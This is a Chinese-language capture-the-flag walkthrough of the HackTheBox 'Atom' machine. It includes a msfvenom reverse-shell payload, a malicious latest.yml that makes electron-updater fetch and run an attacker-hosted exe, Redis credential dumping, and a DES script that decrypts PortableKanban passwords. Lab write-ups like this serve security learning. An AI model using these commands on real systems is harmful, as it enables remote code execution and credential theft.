基本信息

https://www.hackthebox.eu/home/machines/profile/340
10.10.10.237

端口扫描

$ nmap -sC -sV 10.10.10.237
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-21 13:55 CST
Nmap scan report for 10.10.10.237
Host is up (0.070s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE      VERSION
80/tcp  open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Heed Solutions
135/tcp open  msrpc        Microsoft Windows RPC
445/tcp open  microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: ATOM; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h20m01s, deviation: 4h02m30s, median: 0s
| smb-os-discovery:
|   OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
|   OS CPE: cpe:/o:microsoft:windows_10::-
|   Computer name: ATOM
|   NetBIOS computer name: ATOM\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-04-20T22:57:12-07:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-04-21T05:57:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.12 seconds

80/443

Heed solutions:

SMB

smb可以发现一个Software_Updates：

Software_Updates

里面三个client文件夹和一个pdf，pdf下载下来查看：

UAT_Testing_Procedures

根据PDF可以知道使用electron-builder，我们可以在任意client文件夹里放置更新，自动QA，但electron-builder有签名校验

electron-builder

搜到相关内容：

Signature Validation Bypass Leading to RCE In Electron-Updater · Doyensec’s Blog
https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html

大概就是我们可以通过自定义yml文件使其执行其他程序

exploit

生成exe，计算hash，放置yml文件，等待自动QA触发

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.10 LPORT=4444 -f exe -o "r'miao.exe"

shasum -a 512 "r'miao.exe" | cut -d " " -f1 | xxd -r -p | base64 -w 0
lNGCU+j3Qkn/F6VrPXlauNYygdmb1kYwQu6QmkqqCzNcguJMWr2vWDJxb5MoAdbKSZ5QMaiFdzshpnXaVcx7iQ==

latest.yml

1
2
3

version: 1.2.3
path: http://10.10.14.10:7777/r'miao.exe
sha512: lNGCU+j3Qkn/F6VrPXlauNYygdmb1kYwQu6QmkqqCzNcguJMWr2vWDJxb5MoAdbKSZ5QMaiFdzshpnXaVcx7iQ==

user flag

然后jason用户桌面得到user.txt:

提权信息

基础的枚举可以发现redis，直接去查看配置文件，得到密码

C:\Program Files\Redis>type redis.windows-service.conf
type redis.windows-service.conf
# Redis configuration file example
requirepass kidvscat_yes_kidvscat
...

redis

redis中枚举信息，得到admin的密码hash：

10.10.10.237:6379> keys *
1) "pk:ids:MetaDataClass"
2) "pk:ids:User"
3) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
10.10.10.237:6379> get pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
10.10.10.237:6379>

documet

winpeas的结果里可以发现user guide，下载下来查看：

1 2	[+] Looking for documents --limit 100--(T1083) C:\Users\jason\Documents\UAT_Testing_Procedures.pdf C:\Users\jason\Downloads\PortableKanban\User Guide.pdf

根据文档可以知道redis里是Portable Kanban加密后的密码，直接搜索解密方式：

PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval - Windows local Exploit
https://www.exploit-db.com/exploits/49409

decrypt

解出来Administrator密码：

1
2
3

python3 decrypt.py
Enter the Hash : Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
Decrypted Password : kidvscat_admin_@123

github的是根据文件解，可以直接用hash：

import json
import base64
from des import * #python3 -m pip install des

try:
    hash = str(input("Enter the Hash : "))
    hash = base64.b64decode(hash.encode('utf-8'))
    key = DesKey(b"7ly6UznJ")
    print("Decrypted Password : " + key.decrypt(hash,initial=b"XuVUm5fR",padding=True).decode('utf-8'))
except:
    print("Wrong Hash")

root flag

之后直接winrm登录administrator，桌面得到root.txt:

参考资料

Signature Validation Bypass Leading to RCE In Electron-Updater · Doyensec’s Blog
https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval - Windows local Exploit
https://www.exploit-db.com/exploits/49409
Hackthebox Atom writeup | 0xDedinfosec
https://0xdedinfosec.github.io/posts/htb-atom/

Atom - HackTheBox

2021-04-21